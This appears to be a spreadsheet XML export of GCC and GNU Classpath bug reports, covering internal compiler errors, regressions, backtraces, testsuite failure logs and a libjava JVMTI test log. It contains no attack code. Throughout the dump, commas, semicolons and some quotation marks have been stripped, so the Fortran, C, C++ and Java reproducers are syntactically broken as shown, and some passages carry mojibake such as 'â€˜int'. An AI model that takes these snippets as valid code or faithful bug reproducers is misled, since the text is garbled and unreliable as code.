 -o events    (timeout = 300)
PASS: linking events
set_ld_library_path_env_vars: ld_library_path=.:/home/dave/gcc-4.2/objdir/hppa-l
inux/./libjava/.libs:/home/dave/gcc-4.2/objdir/gcc
Setting LD_LIBRARY_PATH to .:/home/dave/gcc-4.2/objdir/hppa-linux/./libjava/.lib
s:/home/dave/gcc-4.2/objdir/gcc:.:/home/dave/gcc-4.2/objdir/hppa-linux/./libjava
/.libs:/home/dave/gcc-4.2/objdir/gcc:.:/home/dave/gcc-4.2/objdir/hppa-linux/./li
bjava/.libs:/home/dave/gcc-4.2/objdir/gcc:/home/dave/gcc-4.2/objdir/hppa-linux/l
ibstdc++-v3/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/libmudflap/.libs:/home/da
ve/gcc-4.2/objdir/hppa-linux/libssp/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/l
ibgomp/.libs:/home/dave/gcc-4.2/objdir/./gcc:/home/dave/gcc-4.2/objdir/./prev-gc
c
JVMTI event notification tests
- enable tests -
created JVMTI environment #0
created JVMTI environment #1
created JVMTI environment #2
setting callbacks for envs
RequestedEvents:
enable VM_INIT for env0 env1 env2
RequestedEvents: VMInit
enable VM_DEATH for env1env2
RequestedEvents: VMInitVMDeath
enable THREAD_END for env2
RequestedEvents: VMInitVMDeathThreadEnd
disposing of env1
RequestedEvents: VMInitVMDeathThreadEnd
disposing of env0
RequestedEvents: VMInitVMDeathThreadEnd
disable VMInit in env2
RequestedEvents: VMDeathThreadEnd
clear VMDeath callback in env2
RequestedEvents: ThreadEnd
sending VMInit
sending ThreadEnd
ThreadEndCB jni_env=0x5678 thread=0x1234
sending VMDeath
disposing of env2
RequestedEvents:
- callback arg tests -
RequestedEvents: VMInitVMDeathThreadStartThreadEndClassFileLoadHookClassLoa
dClassPrepareVMStartExceptionExceptionCatchSingleStepFramePopBreakpointF
ieldAccessFieldModificationMethodEntryMethodExitNativeMethodBindCompiledMet
hodLoadCompiledMethodUnloadDynamicCodeGeneratedDataDumpRequestMonitorWaitMo
nitorWaitedMonitorContendedEnterMonitorContendedEnteredGarbageCollectionStart
GarbageCollectionFinishObjectFreeVMObjectAlloc
VMInitCB jni_env=0x1 thread=0x2
VMDeathCB jni_env=0x1
ThreadStartCB jni_env=0x1 thread=0x2
ThreadEndCB jni_env=0x1 thread=0x2
ClassFileLoadHookCB jni_env=0x1 class_being_redefined=0x2 loader=0x3 name=4 prot
ection_domain=0x5 class_data_len=6 class_data=0x7 new_class_data_len=0x8 new_cla
ss_data=0x9
ClassLoadCB jni_env=0x1 thread=0x2 klass=0x3
ClassPrepareCB jni_env=0x1 thread=0x2 klass=0x3
VMStartCB jni_env=0x1
ExceptionCB jni_env=0x1 thread=0x2 method=0x3 location=0x4 exception=0x5 catch_m
ethod=0x6 catch_location=0x436459d4
ExceptionCatchCB jni_env=0x1 thread=0x2 method=0x3 location=0x4 exception=0x5
SingleStepCB jni_env=0x1 thread=0x2 method=0x3 location=0x4
FramePopCB jni_env=0x1 thread=0x2 method=0x3 was_pooped_by_exception=1
BreakpointCB  jni_env=0x1 thread=0x2 method=0x3 location=0x4
FieldAccessCB jni_env=0x1 thread=0x2 method=0x3 location=0x4 field_klass=0x5 obj
ect=0x6 field=0x7
FieldModificationCB  jni_env=0x1 thread=0x2 method=0x3 location=0x4 field_klass=
0x5 object=0x6 field=0x7 signature_type=8 new_value=1127144256
MethodEntryCB jni_env=0x1 thread=0x2 method=0x3
MethodExitCB jni_env=0x1 thread=0x2 method=0x3 was_popped_by_exception=1 return_
value=6
NativeMethodBindCB jni_env=0x1 thread=0x2 method=0x3 address=0x4 new_address_ptr
=0x5
CompiledMethodLoadCB method=0x1 code_size=0x2 code_addr=0x3 map_length=4 map=0x5
 compile_info=0x6
CompiledMethodUnloadCB method=0x1 code_addr=0x2
DynamicCodeGeneratedCB name=1 address=0x2 length=3
DataDumpRequestCB
MonitorWaitCB jni_env=0x1 thread=0x2 object=0x3 timeout=4
MonitorWaitedCB jni_env=0x1 thread=0x2 object=0x3 timed_out=1
MonitorContendedEnterCB jni_env=0x1 thread=0x2 object=0x3
MonitorContendedEnteredCB jni_env=0x1 thread=0x2 object=0x3
GarbageCollectionStartCB
GarbageCollectionFinishCB
ObjectFreeCB tag=1
VMObjectAllocCB jni_env=0x1 thread=0x2 object=0x3 object_klass=0x4 size=5
FAIL: events output</t>
  </si>
  <si>
    <t>GCC-3906</t>
  </si>
  <si>
    <t>Internal compiler error in change_address at emit-rtl.c:1635</t>
  </si>
  <si>
    <t>gcc -O -c example.c produces i.c.e as reported in synopsis.
I supply a trimmed down example.  Any further trimming
makes the problem either go away or leaves a code that
uses variables without properly initializing them.
Release:
gcc version 3.0 (thread model: posix)
Environment:
SunOS 5.8 Generic_108528-06 sun4u sparc SUNWSun-Blade-100
configured by .../configure --prefix=... (i.e. all defaults)
How-To-Repeat:
gcc -O -c example.i</t>
  </si>
  <si>
    <t>tanmoy</t>
  </si>
  <si>
    <t>GCC-69652</t>
  </si>
  <si>
    <t>[6 Regression] [ICE] verify_ssa fail w/ -O2 -ffast-math -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 37569
Reproducer
While building huge workload I've encountered ICE.
creduce finished w/ attached reproducer.
Reproduce:
$ ./gcc -O2 -ffast-math -ftree-vectorize -march=sandybridge repro.i
repro.i:1:1: warning: return type defaults to â€˜intâ€™ [-Wimplicit-int]
 fn1() {
 ^~~
repro.i: In function â€˜fn1â€™:
repro.i:1:1: error: definition in block 8 does not dominate use in block 7
for SSA_NAME: .MEM_134 in statement:
# VUSE 
_24 = *_13
repro.i:1:1: internal compiler error: verify_ssa failed
0xd12f09 verify_ssa(bool bool)
        /export/users/kyukhin/gcc/git/gcc/gcc/tree-ssa.c:1039
0xa52dad execute_function_todo
        /export/users/kyukhin/gcc/git/gcc/gcc/passes.c:1965
0xa5363b execute_todo
        /export/users/kyukhin/gcc/git/gcc/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Recent gcc-5-branch works fine w/ the case</t>
  </si>
  <si>
    <t>GCC-47051</t>
  </si>
  <si>
    <t>[4.6 Regression] Wrong reallocate</t>
  </si>
  <si>
    <t>In the following a reallocation seems to happen changing the bounds of a. However the size of a and b are the same so I would not expect this.
 INTEGER DIMENSION(:) ALLOCATABLE :: ab
 ALLOCATE(a(-1:1)b(1:3))
 b=0
 a=b
 write(6*) LBOUND(a)
 IF(LBOUND(a1).NE.-1) STOP BUG
END</t>
  </si>
  <si>
    <t>GCC-27400</t>
  </si>
  <si>
    <t>switch indexed by class crashes compiler</t>
  </si>
  <si>
    <t>$ cat EnumClass.java
class EnumClass
{
    static public final EnumClass x = new EnumClass ()
}
$ cat ClassSwitch.java
class ClassSwitch
{
    public static void main (String[] args)
    {
        switch (args.length) {
        case EnumClass.x: return
        }
        System.out.println (Switched)
    }
}
$ gcj ClassSwitch.java
ClassSwitch.java:5: internal compiler error: Segmentation fault
$ gcj --version
gcj (GCC) 4.1.0 20060304 (Red Hat 4.1.0-3)
Copyright (C) 2006 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>GCC-365</t>
  </si>
  <si>
    <t>Turn off 'ANSI C++ forbids declaration `%D' with no type' warnings</t>
  </si>
  <si>
    <t>Solaris's X headers (/usr/openwin/include) contain numerous
declarations with implicit int return type.  -fpermissive
allows c++ code to use these headers but the number of 
warnings (168 in Xlib.h alone) is a real burden.  Some way 
to turn off these warnings would be wonderful.
The description for the -Wreturn-type flag suggests that
-Wno-return-type should turn off these warnings but it
doesn't.
Release:
egcs-2.95.2
Environment:
Solaris 2.6 Solaris 7
How-To-Repeat:
echo '#include ' &gt; foo.C
g++ -I/usr/openwin/include -c foo.C</t>
  </si>
  <si>
    <t>kherron</t>
  </si>
  <si>
    <t>GCC-41214</t>
  </si>
  <si>
    <t>[4.5 regression] Null pointer dereferenced in _Unwind_SetGR()</t>
  </si>
  <si>
    <t>GCC 4.5.0 20090827
When I run any program which throws an exception I get a segfault:
__cxa_throw ............. libstdc++-v3/libsupc++/eh_throw.cc:78
_Unwind_RaiseException .. gcc/unwind.inc:62
__gxx_personality_v0 .... libsupc++/eh_personality.cc:706
_Unwind_SetGR ........... gcc/unwind-dw2.c:215
GCC is compiled with -O3 maybe it makes a difference.</t>
  </si>
  <si>
    <t>GCC-37147</t>
  </si>
  <si>
    <t>New failures: 20_util/ratio/comparisons/comp2.cc et al</t>
  </si>
  <si>
    <t>Last known good revision:    139006
Known to fail with revision: 139008 .. 139189.
For the changes in this range I only see a few libstdc++ configury changes that moved tests and generalized them in a seemingly correct manner without typos or obvious ordering issues but perhaps there's non-obvious ordering issues.
Either way I now see (the FAIL lines are regressions):
...
Running /x/gcc/libstdc++-v3/testsuite/libstdc++-dg/conformance.exp ...
FAIL: 20_util/ratio/comparisons/comp2.cc (test for excess errors)
WARNING: 20_util/ratio/comparisons/comp2.cc compilation failed to produce executable
...
FAIL: 20_util/ratio/operations/ops2.cc (test for excess errors)
WARNING: 20_util/ratio/operations/ops2.cc compilation failed to produce executable
FAIL: 20_util/ratio/operations/ops3.cc (test for excess errors)
WARNING: 20_util/ratio/operations/ops3.cc compilation failed to produce executable
...
FAIL: 27_io/basic_ostream/inserters_other/char/error_code.cc (test for excess errors)
WARNING: 27_io/basic_ostream/inserters_other/char/error_code.cc compilation failed to produce executable
with this in the .log:
/x/gcc/libstdc++-v3/testsuite/20_util/ratio/comparisons/comp2.cc:25: error: 'INTMAX_MAX' was not declared in this scope
(various errors followed)
and similar for the other tests.
Not sure at a glance what caused this but maybe it's obvious to the author (CCed).
N.B.: cross-target newlib.</t>
  </si>
  <si>
    <t>GCC-78501</t>
  </si>
  <si>
    <t>[7 regression] SEGV in vrp_val_max</t>
  </si>
  <si>
    <t>As of r242800 Ada bootstrap is broken on (at least) Solaris/x86 and SPARC: in 
stage2 I get
/var/gcc/regression/trunk/12-gcc/build/./prev-gcc/xgcc -B/var/gcc/regression/trunk/12-gcc/build/./prev-gcc/ -B/vol/gcc/i386-pc-solaris2.12/bin/ -B/vol/gcc/i386-pc-solaris2.12/bin/ -B/vol/gcc/i386-pc-solaris2.12/lib/ -isystem /vol/gcc/i386-pc-solaris2.12/include -isystem /vol/gcc/i386-pc-solaris2.12/sys-include    -c -g -O2  -gnatpg -gnatwns -gnata -W -Wall -nostdinc -I- -I. -Iada/generated -Iada -I/vol/gcc/src/hg/trunk/local/gcc/ada -I/vol/gcc/src/hg/trunk/local/gcc/ada/gcc-interface /vol/gcc/src/hg/trunk/local/gcc/ada/osint.adb -o ada/osint.o
raised CONSTRAINT_ERROR : SIGSEGV
make: *** [ada/osint.o] Error 1
Thread 2 received signal SIGSEGV Segmentation fault.
[Switching to Thread 1 (LWP 1)]
0x099519ac in vrp_val_max (type=0x0)
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:156
156       if (!INTEGRAL_TYPE_P (type))
(gdb) where
#0  0x099519ac in vrp_val_max (type=0x0)
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:156
#1  0x0995de5d in extract_range_basic (vr=0xfeffd164 stmt=0xfa517f24)
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:4033
#2  0x09967eb5 in vrp_visit_assignment_or_call (stmt=0xfa517f24 
    output_p=0xfeffd194 vr=0xfeffd164)
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:7137
#3  0x09969b75 in extract_range_from_stmt (stmt=0xfa517f24 
    taken_edge_p=0xfeffd174 output_p=0xfeffd194 vr=0xfeffd164)
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:7927
#4  0x099730f5 in evrp_dom_walker::before_dom_children (this=0xfeffd32c 
    bb=0xfa5ec200) at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:10885
#5  0x09f71ed5 in dom_walker::walk (this=0xfeffd32c bb=0xfa5ec200)
    at /vol/gcc/src/hg/trunk/local/gcc/domwalk.c:265
#6  0x09973dbe in execute_early_vrp ()
    at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:11109
#7  0x099743af in (anonymous namespace)::pass_early_vrp::execute (
    this=0xac86450) at /vol/gcc/src/hg/trunk/local/gcc/tree-vrp.c:11358
#8  0x09590d66 in execute_one_pass (pass=0xac86450)
    at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2370
#9  0x095910a1 in execute_pass_list_1 (pass=0xac86450)
    at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2459
#10 0x095910d1 in execute_pass_list_1 (pass=0xac86200)
    at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2460
#11 0x0959111b in execute_pass_list (fn=0xfade9680 pass=0xac86100)
    at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2470
#12 0x0958f713 in do_per_function_toporder (
    callback=0x95910e9  
    data=0xac86100) at /vol/gcc/src/hg/trunk/local/gcc/passes.c:1729
#13 0x09591c90 in execute_ipa_pass_list (pass=0xac860c0)
    at /vol/gcc/src/hg/trunk/local/gcc/passes.c:2812
#14 0x091ec739 in ipa_passes ()
    at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:2286
#15 0x091ecb64 in symbol_table::compile (this=0xfac09000)
    at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:2425
#16 0x091ed010 in symbol_table::finalize_compilation_unit (this=0xfac09000)
    at /vol/gcc/src/hg/trunk/local/gcc/cgraphunit.c:2584
#17 0x0968f70c in compile_file ()
    at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:488
#18 0x09691937 in do_compile ()
    at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:1983
#19 0x09691bf2 in toplev::main (this=0xfeffdafe argc=34 argv=0xfeffdb54)
    at /vol/gcc/src/hg/trunk/local/gcc/toplev.c:2117
#20 0x0a09b44c in main (argc=34 argv=0xfeffdb54)
    at /vol/gcc/src/hg/trunk/local/gcc/main.c:39
This has obviously been introduced by
2016-11-23  Prathamesh Kulkarni  
        PR middle-end/78153
        * gimple-fold.c (fold_stmt_1): Handle case for GIMPLE_RETURN.
        * tree-vrp.c (extract_range_basic): Handle case for
        CFN_BUILT_IN_STRLEN.
  Rainer</t>
  </si>
  <si>
    <t>GCC-82622</t>
  </si>
  <si>
    <t>[PDT] ICE in structure_alloc_comps at fortran/trans-array.c:8963</t>
  </si>
  <si>
    <t>This one is an interesting case ...
(... and the last PR derived from this search)
$ cat z1.f90
program p
   type t(a)
      integer len :: a
   end type
   type t2(b)
      integer len :: b
      type(t(1)) :: r(b)
   end type
   type(t2(:)) allocatable :: x
   allocate (t2(3) :: x)
end
$ gfortran-8-20171015 -c z1.f90
z1.f90:10:0:
    allocate (t2(3) :: x)
internal compiler error: Segmentation fault
0xb5a08f crash_signal
        ../../gcc/toplev.c:326
0x73cc83 structure_alloc_comps
        ../../gcc/fortran/trans-array.c:8963
0x73ba67 structure_alloc_comps
        ../../gcc/fortran/trans-array.c:8371
0x73df30 gfc_allocate_pdt_comp(gfc_symbol* tree_node* int gfc_actual_arglist*)
        ../../gcc/fortran/trans-array.c:9301
0x73c083 structure_alloc_comps
        ../../gcc/fortran/trans-array.c:9099
0x73df30 gfc_allocate_pdt_comp(gfc_symbol* tree_node* int gfc_actual_arglist*)
        ../../gcc/fortran/trans-array.c:9301
0x79b84a gfc_trans_allocate(gfc_code*)
        ../../gcc/fortran/trans-stmt.c:6407
0x72d2f7 trans_code
        ../../gcc/fortran/trans.c:1976
0x753f6c gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6420
0x6e6580 translate_all_program_units
        ../../gcc/fortran/parse.c:6088
0x6e6580 gfc_parse_file()
        ../../gcc/fortran/parse.c:6291
0x72a6bf gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-19575</t>
  </si>
  <si>
    <t>cdabs intrinsic incorrectly handled with -std=f95</t>
  </si>
  <si>
    <t>The following code:
program abs_test1
   implicit none
   intrinsic cdabs
!   write(**) cdabs((43)) ! Causes ICE as well
   call sub(cdabs)
end program abs_test1
subroutine sub(f)
   implicit none
   interface
      elemental function f(x)
         complex(kind(1.0d0)) intent(in) :: x
         real(kind(x)) :: f
      end function f
   end interface
   complex(kind(1.0d0)) x
   x = (43)
   write(**) f(x)
end subroutine sub
has an incorrect behavior when -std=f95 is specified (according to James Van
Buskirk see
http://home.comcast.net/~kmbtib/gfortran_bugs/REF_JVB_GFTN_003.html). On
powerpc-apple-darwin I get:
$ gfortran abs_test1.f90 &amp;&amp; ./a.out
   5.00000000000000     
$ gfortran abs_test1.f90 -std=f95 &amp;&amp; ./a.out
   2.25000000000000     
while on i686-mingw:
$ gfortran abs_test1.f90 &amp;&amp; ./a.out
        5.00000000000000     
$ gfortran abs_test1.f90 -std=f95 &amp;&amp; ./a.out
        NaN
Another related issue: when uncommenting the commented line the behavior is
correct without -std=f95 (error issued at compile-time) but -std=f95 causes ICE:
$ gfortran abs_test1.f90 -std=f95 &amp;&amp; ./a.out
abs_test1.f90: In function 'MAIN__':
abs_test1.f90:12: internal compiler error: in gfc_typenode_for_spec at
fortran/trans-types.c:613</t>
  </si>
  <si>
    <t>GCC-50762</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in extract_insn at recog.c:2137 (unrecognizable insn)</t>
  </si>
  <si>
    <t>Created attachment 25526
reduced testcase
Compiler output:
$ gcc -mavx2 testcase.c 
testcase.c: In function 'foo':
testcase.c:11:1: error: unrecognizable insn:
(insn 17 16 18 3 (set (reg:V4DF 62 [ v.3 ])
        (unspec:V4DF [
                (reg:V8SI 65)
                (reg:V8SI 66)
                (reg:V4DF 62 [ v.3 ])
            ] UNSPEC_BLENDV)) testcase.c:10 -1
     (nil))
testcase.c:11:1: internal compiler error: in extract_insn at recog.c:2137
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r180072 - crash
4.6 - doesn't recognise -mavx2</t>
  </si>
  <si>
    <t>GCC-21858</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in compare_values at tree-vrp.c:301</t>
  </si>
  <si>
    <t>Preprocessed file supplied (bug.i)
This would appear to be related to RESOLVED bugs
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=21188 and
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=21227
As far as I can make out the fixes for those bugs have been checked in I'm
using gcc tip of CVS mainline as at Wed Jun  1 02:00 UTC 2005 and the bug is
still present. ie. This is either a different bug manifesting in the same place
or the old bug revived. This affects both the arm and the i686 backends so I
suspect it is before it hits the backend.)
/usr/local/bin/arm-elf-gcc -v
Using built-in specs.
Target: arm-elf
Configured with: ../combined/configure --target=arm-elf --enable-languages=cc++
--with-gnu-as --with-gnu-ld --with-newlib
Thread model: single
gcc version 4.1.0 20050601 (experimental)
Also...
/opt/gcc4_1/bin/gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --enable-languages=c --prefix=/opt/gcc4_1
Thread model: posix
gcc version 4.1.0 20050601 (experimental)
Using gcc -v I can see what gcc is running when it crashes and hence reproduce
the bug like so...
cd /home/johnc/tmp
/opt/gcc4_1/libexec/gcc/i686-pc-linux-gnu/4.1.0/cc1 -fpreprocessed
/home/johnc/tmp/bug.i  -dumpbase bug.i -auxbase bug -Os -std=c9x -v -o
/home/johnc/tmp/bug.s
ignoring nonexistent directory
/opt/gcc4_1/lib/gcc/i686-pc-linux-gnu/4.1.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /opt/gcc4_1/include
 /opt/gcc4_1/lib/gcc/i686-pc-linux-gnu/4.1.0/include
 /usr/include
End of search list.
 strcoll
 dsdblm_CreateBlock
/home/johnc/tmp/bug.i: In function 'dsdblm_CreateBlock':
/home/johnc/tmp/bug.i:201: warning: comparison between pointer and integer
 dsdblm_WriteBlock
Analyzing compilation unitPerforming intraprocedural optimizations
Assembling functions:
 dsdblm_CreateBlock
/home/johnc/tmp/bug.i: In function 'dsdblm_CreateBlock':
/home/johnc/tmp/bug.i:196: internal compiler error: in compare_values at
tree-vrp.c:301
I can then use gdb on cc1 and put a breakpoint on fancy_abort and get a stack
trace...
where
#0  fancy_abort (file=0x12d  line=0
function=0x12d )
    at ../../combined/gcc/diagnostic.c:588
#1  0x08382ab8 in compare_values (val1=0xb7fa8680 val2=0xb7ddfc30) at
../../combined/gcc/tree-vrp.c:410
#2  0x083848bd in compare_range_with_value (comp=LE_EXPR vr=0xb7dc9840
val=0xb7ddfc30) at ../../combined/gcc/tree-vrp.c:1234
#3  0x08386e64 in vrp_evaluate_conditional (cond=0xb7d66798) at
../../combined/gcc/tree-vrp.c:1992
#4  0x08387025 in vrp_visit_cond_stmt (stmt=0xb7d6c168 taken_edge_p=0xbf9bec20)
at ../../combined/gcc/tree-vrp.c:2044
#5  0x083874df in vrp_visit_stmt (stmt=0xb7d6c168 taken_edge_p=0x12d
output_p=0x12d) at ../../combined/gcc/tree-vrp.c:2089
#6  0x08163401 in simulate_stmt (stmt=0xb7d6c168) at
../../combined/gcc/tree-ssa-propagate.c:302
#7  0x08163896 in simulate_block (block=0xb7de2af8) at
../../combined/gcc/tree-ssa-propagate.c:425
#8  0x08164a7d in ssa_propagate (visit_stmt=0x12d visit_phi=0x12d) at
../../combined/gcc/tree-ssa-propagate.c:667
#9  0x08388526 in execute_vrp () at ../../combined/gcc/tree-vrp.c:2383
#10 0x080d2c02 in execute_one_pass (pass=0x8507600) at
../../combined/gcc/tree-optimize.c:623
#11 0x080d2d28 in execute_pass_list (pass=0x8507600) at
../../combined/gcc/tree-optimize.c:660
#12 0x080d2d48 in execute_pass_list (pass=0x85053c0) at
../../combined/gcc/tree-optimize.c:661
#13 0x080d3008 in tree_rest_of_compilation (fndecl=0xb7de157c) at
../../combined/gcc/tree-optimize.c:793
#14 0x0805d44d in c_expand_body (fndecl=0xb7de157c) at
../../combined/gcc/c-decl.c:6593
#15 0x083adf7a in cgraph_expand_function (node=0xb7de1b64) at
../../combined/gcc/cgraphunit.c:949
#16 0x083ae14b in cgraph_expand_all_functions () at
../../combined/gcc/cgraphunit.c:1013
#17 0x083ae41a in cgraph_optimize () at ../../combined/gcc/cgraphunit.c:1115
#18 0x0834d136 in compile_file () at ../../combined/gcc/toplev.c:1008
#19 0x0834e78b in do_compile () at ../../combined/gcc/toplev.c:2123
#20 0x0834e805 in toplev_main (argc=301 argv=0xbf9bef34) at
../../combined/gcc/toplev.c:2155
#21 0x080b110b in main (argc=301 argv=0x12d) at ../../combined/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-23634</t>
  </si>
  <si>
    <t>temporary array of character ICE with non constant size</t>
  </si>
  <si>
    <t>GNU F95 version 4.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.1.
Fedora Core 1
Linux looneyjr.cam.nist.gov 2.4.25 #2 Wed Apr 21 12:08:18 EDT 2004 i686 i686
i386 GNU/Linux
mitchell@looneyjr&gt; gfortran -v -c stopwatch.f90
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.1/configure
--prefix=/local/home/mitchell/tmp/gcc-4.0.1-install
-with-local-prefix=/local/home/mitchell/tmp/gcc-4.0.1-include
Thread model: posix
gcc version 4.0.1
 /local/home/mitchell/tmp/gcc-4.0.1-install/libexec/gcc/i686-pc-linux-gnu/4.0.1/f951
stopwatch.f90 -quiet -dumpbase stopwatch.f90 -mtune=pentiumpro -auxbase
stopwatch -version -o /tmp/ccK2OQTb.s
GNU F95 version 4.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
stopwatch.f90: In function â€˜which_clocks_sâ€™:
stopwatch.f90:3289: internal compiler error: in gfc_conv_expr_descriptor at
fortran/trans-array.c:3633
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is my first time using Bugzilla and I don't see where/how to attach the
source file to the report.  I hope that when I hit commit it will ask for it!</t>
  </si>
  <si>
    <t>william.mitchell</t>
  </si>
  <si>
    <t>GCC-71913</t>
  </si>
  <si>
    <t>[5/6/7 Regression] Missing copy elision with operator new</t>
  </si>
  <si>
    <t>void* operator new(unsigned long void* p) { return p }
void always_assert(bool)
struct IndirectReturn {
  IndirectReturn() {}
  // Make sure the indirect return value is never copied and RVO kicked in
  IndirectReturn(const IndirectReturn }
  IndirectReturn
  ~IndirectReturn() {}
}
IndirectReturn foo()
void bar(void* ptr) {
  IndirectReturn x
  new (ptr) IndirectReturn(foo())
}
---- CUT -----
In GCC 4.9.3 we did not get the assert but in 5.x and above we do.
This causes HHVM to crash some of the time.
Note if I read C++17 correctly this is a required to get rid of the copy constructor here.</t>
  </si>
  <si>
    <t>CLASSPATH-30963</t>
  </si>
  <si>
    <t>JBoss 4.0.5 fails to start with MBeanServer exception</t>
  </si>
  <si>
    <t>JBoss 4.0.5 fails to start on Classpath HEAD with error:
19:52:17557 WARN  [ServiceController] Problem creating service jboss.system:service=MainDeployer
java.lang.IllegalStateException: No 'jboss' MBeanServer found!
   at org.jboss.mx.util.MBeanServerLocator.locateJBoss(MBeanServerLocator.java:122)
   at org.jboss.mx.util.MBeanProxyExt.create(MBeanProxyExt.java:335)
   at org.jboss.system.server.ServerConfigLocator.locate(ServerConfigLocator.java:42)
   at org.jboss.deployment.MainDeployer.createService(MainDeployer.java:471)
   at org.jboss.system.ServiceMBeanSupport.jbossInternalCreate(ServiceMBeanSupport.java:260)
   at org.jboss.system.ServiceMBeanSupport.jbossInternalLifecycle(ServiceMBeanSupport.java:243)
   at java.lang.reflect.Method.invokeNative(Native Method)
   at java.lang.reflect.Method.invoke(Method.java:355)
   at org.jboss.mx.interceptor.ReflectedDispatcher.invoke(ReflectedDispatcher.java:155)
   at org.jboss.mx.server.Invocation.dispatch(Invocation.java:94)
   at org.jboss.mx.interceptor.AbstractInterceptor.invoke(AbstractInterceptor.java:133)
   at org.jboss.mx.server.Invocation.invoke(Invocation.java:88)
   at org.jboss.mx.interceptor.ModelMBeanOperationInterceptor.invoke(ModelMBeanOperationInterceptor.java:142)
   at org.jboss.mx.server.Invocation.invoke(Invocation.java:88)
   at org.jboss.mx.server.AbstractMBeanInvoker.invoke(AbstractMBeanInvoker.java:264)
   at org.jboss.mx.server.MBeanServerImpl.invoke(MBeanServerImpl.java:659)
   at org.jboss.system.ServiceController$ServiceProxy.invoke(ServiceController.java:978)
   at $Proxy0.create(Unknown Source)
   at org.jboss.system.ServiceController.create(ServiceController.java:330)
   at org.jboss.system.ServiceController.create(ServiceController.java:273)
   at java.lang.reflect.Method.invokeNative(Native Method)
   at java.lang.reflect.Method.invoke(Method.java:355)
   at org.jboss.mx.interceptor.ReflectedDispatcher.invoke(ReflectedDispatcher.java:155)
   at org.jboss.mx.server.Invocation.dispatch(Invocation.java:94)
   at org.jboss.mx.server.Invocation.invoke(Invocation.java:86)
   at org.jboss.mx.server.AbstractMBeanInvoker.invoke(AbstractMBeanInvoker.java:264)
   at org.jboss.mx.server.MBeanServerImpl.invoke(MBeanServerImpl.java:659)
   at org.jboss.system.server.ServerImpl.startBootService(ServerImpl.java:564)
   at org.jboss.system.server.ServerImpl.doStart(ServerImpl.java:446)
   at org.jboss.system.server.ServerImpl.start(ServerImpl.java:362)
   at org.jboss.Main.boot(Main.java:200)
   at org.jboss.Main$1.run(Main.java:490)
   at java.lang.Thread.run(Thread.java:743)
   at java.lang.VMThread.run(VMThread.java:120)
A similar problem is logged trying to create the other initial deployer services.</t>
  </si>
  <si>
    <t>GCC-65345</t>
  </si>
  <si>
    <t>ICE with _Generic selection on _Atomic int</t>
  </si>
  <si>
    <t>gcc49 (FreeBSD Ports Collection) 4.9.3 20150218 (prerelease)
% cat test.c
_Atomic int i  
int j = _Generic( i+1 int: 1 default: 0 )
% gcc49 -c test.c
tmp.c:2:1: internal compiler error: Segmentation fault
 int j = _Generic( i+1 int: 1 default: 0 )
 ^
no stack trace because unwind library not available
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The error only happens when i is part of an expression so _Generic(i...) works correctly (it returns 1).  Qualifiers like const and volatile instead of _Atomic also work.</t>
  </si>
  <si>
    <t>tijl</t>
  </si>
  <si>
    <t>GCC-65742</t>
  </si>
  <si>
    <t>[5 Regression] Several libgomp.oacc-* failures after r221922.</t>
  </si>
  <si>
    <t>There are now several failures for libgomp.oacc-* tests after r221922 (see https://gcc.gnu.org/ml/gcc-testresults/2015-04/msg00852.html r221921 is OK see https://gcc.gnu.org/ml/gcc-testresults/2015-04/msg00837.html)
FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/acc_on_device-1.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 execution test
FAIL: libgomp.oacc-c/../libgomp.oacc-c-c++-common/if-1.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 execution test
FAIL: libgomp.oacc-c++/../libgomp.oacc-c-c++-common/acc_on_device-1.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 execution test
FAIL: libgomp.oacc-c++/../libgomp.oacc-c-c++-common/if-1.c -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0 execution test
FAIL: libgomp.oacc-fortran/acc_on_device-1-1.f90 -DACC_DEVICE_TYPE_host_nonshm=1 -DACC_MEM_SHARED=0  -O  execution test
